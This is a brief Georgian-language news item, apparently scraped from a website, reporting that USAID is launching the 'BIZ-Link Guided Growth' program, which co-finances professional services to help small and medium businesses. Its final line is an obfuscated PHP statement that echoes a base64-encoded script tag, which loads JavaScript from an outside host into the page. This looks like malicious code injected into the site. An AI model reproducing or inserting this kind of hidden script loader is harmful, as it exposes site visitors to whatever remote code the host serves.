celsiusi
ავერსი საქკაბელი
USAID ეკონომიკური უსაფრთხოების პროგრამას იწყებს. როგორც  USAID-დის მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, „BIZ-Link Guided Growth“-ი არის ინიციატივა, რომლის მიზანია, ხელი შეუწყოს სამიზნე სექტორებში მოღვაწე მცირე და საშუალო მეწარმეებს ფინანსების მოზიდვაში, საექსპორტო გაყიდვებში, ბიზნეს მოდელის ტრანსფორმაციაში ან შესაბამისი სერტიფიკატების მიღებისთვის და მათი ბიზნესისთვის საჭირო ტექნიკური სტანდარტების იდენტიფიცირებასა და დანერგვაში.
 
„პროგრამის ხელშეწყობა გამოიხატება მეწარმეებისთვის შესაბამისი გამოცდილების მქონე პროფესიონალთა მომსახურების თანადაფინანსებაში, რომლებიც უშუალოდ დაგეგმავენ, წარმართავენ და განახორციელებენ კომპანიების იმ საოპერაციო აქტივობებს, რომლებიც გამიზნულია აღნიშნული მიზნების მიღწევაზე“, - ნათქვამია გავრცელებულ რელიზში.
 
USAID -ის ინფორმაციითვე, ამ ეტაპზე ინიციატივაში მონაწილეობაზე ინტერესის გამოსახატად, საკმარისია დაინტერესებულმა მეწარმეებმა შეავსონ ძალიან მარტივი აპლიკაციის ფორმა, რომლის შევსებაც შესაძლებელია 10-15 წუთში.
 
ამისთვის, ისინი უნდა გაეცნონ პროექტის აღწერასა და განაცხადის შემოტანის ინსტრუქციას, რომელიც მოცემულია შემდეგ ბმულზე.
1452
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");